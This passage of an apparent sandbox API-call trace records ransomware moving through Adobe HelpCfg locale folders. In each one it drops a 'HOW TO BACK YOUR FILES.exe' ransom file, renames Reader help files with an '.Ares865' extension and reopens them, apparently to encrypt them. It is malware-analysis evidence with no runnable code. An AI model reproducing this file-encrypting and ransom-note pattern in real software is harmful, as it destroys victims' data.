"c:\\program files (x86)\\common files\\adobe\\helpcfg\\fi_fi\\reader_10.0.helpcfg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0152.365] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=349) returned 1 [0152.365] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0152.365] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4a58 [0152.365] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0152.368] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\eu_ES", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\eu_ES") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\eu_ES" [0152.368] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e49e0 | out: hHeap=0x2b0000) returned 1 [0152.368] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ba8 | out: hHeap=0x2b0000) returned 1 [0152.368] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\eu_ES") returned 55 [0152.368] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\eu_ES" | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\eu_ES") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\eu_ES" [0152.368] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0152.368] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\eu_ES\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\eu_es\\how to back your files.exe"), bFailIfExists=1) returned 0 [0152.369] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0152.370] GetLastError () returned 0x0 [0152.370] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0152.370] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0152.370] CloseHandle (hObject=0x120) returned 1 [0152.370] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0152.370] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0152.370] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\eu_ES\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5cc7c0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x53a40ae0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53a40ae0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0152.370] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0152.370] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0152.370] lstrcpyW (in: lpString1=0x2cce470, lpString2="Reader_10.0.helpcfg" | out: lpString1="Reader_10.0.helpcfg") returned="Reader_10.0.helpcfg" [0152.370] lstrlenW (lpString="Reader_10.0.helpcfg") returned 19 [0152.370] lstrlenW (lpString="Ares865") returned 7 [0152.370] lstrcmpiW (lpString1="helpcfg", lpString2="Ares865") returned 1 [0152.371] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\eu_ES\\Reader_10.0.helpcfg.Ares865") returned 83 [0152.371] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\eu_ES\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\eu_es\\reader_10.0.helpcfg"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\eu_ES\\Reader_10.0.helpcfg.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\eu_es\\reader_10.0.helpcfg.ares865"), dwFlags=0x1) returned 1 [0152.372] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\eu_ES\\Reader_10.0.helpcfg.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\eu_es\\reader_10.0.helpcfg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0152.372] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=349) returned 1 [0152.372] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0152.373] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e49e0 [0152.373] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0152.376] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\es_ES", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\es_ES") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\es_ES" [0152.376] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4968 | out: hHeap=0x2b0000) returned 1 [0152.376] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e79c8 | out: hHeap=0x2b0000) returned 1 [0152.376] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\es_ES") returned 55 [0152.376] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\es_ES" | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\es_ES") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\es_ES" [0152.376] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0152.376] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\es_ES\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\es_es\\how to back your files.exe"), bFailIfExists=1) returned 0 [0152.377] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0152.377] GetLastError () returned 0x0 [0152.377] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0152.377] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0152.377] CloseHandle (hObject=0x120) returned 1 [0152.377] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0152.377] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0152.377] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\es_ES\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5cc7c0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x53a40ae0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53a40ae0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0152.378] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0152.378] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0152.378] lstrcpyW (in: lpString1=0x2cce470, lpString2="Reader_10.0.helpcfg" | out: lpString1="Reader_10.0.helpcfg") returned="Reader_10.0.helpcfg" [0152.378] lstrlenW (lpString="Reader_10.0.helpcfg") returned 19 [0152.378] lstrlenW (lpString="Ares865") returned 7 [0152.378] lstrcmpiW (lpString1="helpcfg", lpString2="Ares865") returned 1 [0152.378] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\es_ES\\Reader_10.0.helpcfg.Ares865") returned 83 [0152.378] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\es_ES\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\es_es\\reader_10.0.helpcfg"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\es_ES\\Reader_10.0.helpcfg.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\es_es\\reader_10.0.helpcfg.ares865"), dwFlags=0x1) returned 1 [0152.380] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\es_ES\\Reader_10.0.helpcfg.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\es_es\\reader_10.0.helpcfg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0152.380] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=349) returned 1 [0152.380] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0152.380] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4968 [0152.380] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0152.383] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\en_US", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\en_US") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\en_US" [0152.383] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e48f0 | out: hHeap=0x2b0000) returned 1 [0152.383] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e79a8 | out: hHeap=0x2b0000) returned 1 [0152.383] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\en_US") returned 55 [0152.383] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\en_US" | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\en_US") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\en_US" [0152.383] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0152.383] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\en_US\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\en_us\\how to back your files.exe"), bFailIfExists=1) returned 0 [0152.384] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0152.385] GetLastError () returned 0x0 [0152.385] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0152.385] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0152.385] CloseHandle (hObject=0x120) returned 1 [0152.385] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0152.385] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0152.385] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\en_US\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5a6660, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x53a40ae0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53a40ae0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0152.385] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0152.385] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0152.385] lstrcpyW (in: lpString1=0x2cce470, lpString2="Reader_10.0.helpcfg" | out: lpString1="Reader_10.0.helpcfg") returned="Reader_10.0.helpcfg" [0152.385] lstrlenW (lpString="Reader_10.0.helpcfg") returned 19 [0152.385] lstrlenW (lpString="Ares865") returned 7 [0152.385] lstrcmpiW (lpString1="helpcfg", lpString2="Ares865") returned 1 [0152.386] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\en_US\\Reader_10.0.helpcfg.Ares865") returned 83 [0152.386] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\en_US\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\en_us\\reader_10.0.helpcfg"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\en_US\\Reader_10.0.helpcfg.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\en_us\\reader_10.0.helpcfg.ares865"), dwFlags=0x1) returned 1 [0152.387] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\en_US\\Reader_10.0.helpcfg.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\en_us\\reader_10.0.helpcfg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0152.387] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=344) returned 1 [0152.387] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0152.387] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e48f0 [0152.388] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0152.395] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\de_DE", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\de_DE") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\de_DE" [0152.395] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4878 | out: hHeap=0x2b0000) returned 1 [0152.395] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7988 | out: hHeap=0x2b0000) returned 1 [0152.395] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\de_DE") returned 55 [0152.395] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\de_DE" | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\de_DE") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\de_DE" [0152.395] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0152.395] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\de_DE\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\de_de\\how to back your files.exe"), bFailIfExists=1) returned 0 [0152.396] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0152.396] GetLastError () returned 0x0 [0152.396] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0152.396] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0152.396] CloseHandle (hObject=0x120) returned 1 [0152.397] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0152.397] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0152.397] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\de_DE\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5a6660, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x53a66c40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53a66c40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0152.397] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0152.397] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0152.397] lstrcpyW (in: lpString1=0x2cce470, lpString2="Reader_10.0.helpcfg" | out: lpString1="Reader_10.0.helpcfg") returned="Reader_10.0.helpcfg" [0152.397] lstrlenW (lpString="Reader_10.0.helpcfg") returned 19 [0152.397] lstrlenW (lpString="Ares865") returned 7 [0152.397] lstrcmpiW (lpString1="helpcfg", lpString2="Ares865") returned 1 [0152.397] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\de_DE\\Reader_10.0.helpcfg.Ares865") returned 83 [0152.397] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\de_DE\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\de_de\\reader_10.0.helpcfg"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\de_DE\\Reader_10.0.helpcfg.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\de_de\\reader_10.0.helpcfg.ares865"), dwFlags=0x1) returned 1 [0152.399] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\de_DE\\Reader_10.0.helpcfg.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\de_de\\reader_10.0.helpcfg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0152.399] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=349) returned 1 [0152.399] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0152.399] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4878 [0152.399] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0152.407] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\da_DK", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\da_DK") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\da_DK" [0152.407] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4800 | out: hHeap=0x2b0000) returned 1 [0152.407] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7968 | out: hHeap=0x2b0000) returned 1 [0152.407] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\da_DK") returned 55 [0152.407] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\da_DK" | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\da_DK") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\da_DK" [0152.408] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0152.408] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\da_DK\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\da_dk\\how to back your files.exe"), bFailIfExists=1) returned 0 [0152.408] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0152.409] GetLastError () returned 0x0 [0152.409] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0152.409] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0152.409] CloseHandle (hObject=0x120) returned 1 [0152.409] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0152.409] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0152.409] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\da_DK\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d580500, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x53a66c40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53a66c40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0152.409] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0152.409] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0152.410] lstrcpyW (in: lpString1=0x2cce470, lpString2="Reader_10.0.helpcfg" | out: lpString1="Reader_10.0.helpcfg") returned="Reader_10.0.helpcfg" [0152.410] lstrlenW (lpString="Reader_10.0.helpcfg") returned 19 [0152.410] lstrlenW (lpString="Ares865") returned 7 [0152.410] lstrcmpiW (lpString1="helpcfg", lpString2="Ares865") returned 1 [0152.410] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\da_DK\\Reader_10.0.helpcfg.Ares865") returned 83 [0152.410] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\da_DK\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\da_dk\\reader_10.0.helpcfg"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\da_DK\\Reader_10.0.helpcfg.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\da_dk\\reader_10.0.helpcfg.ares865"), dwFlags=0x1) returned 1 [0152.411] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\da_DK\\Reader_10.0.helpcfg.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\da_dk\\reader_10.0.helpcfg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0152.412] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=349) returned 1 [0152.412] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0152.412] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4800 [0152.412] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0152.416] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\cs_CZ", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\cs_CZ") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\cs_CZ" [0152.416] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0152.416] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7948 | out: 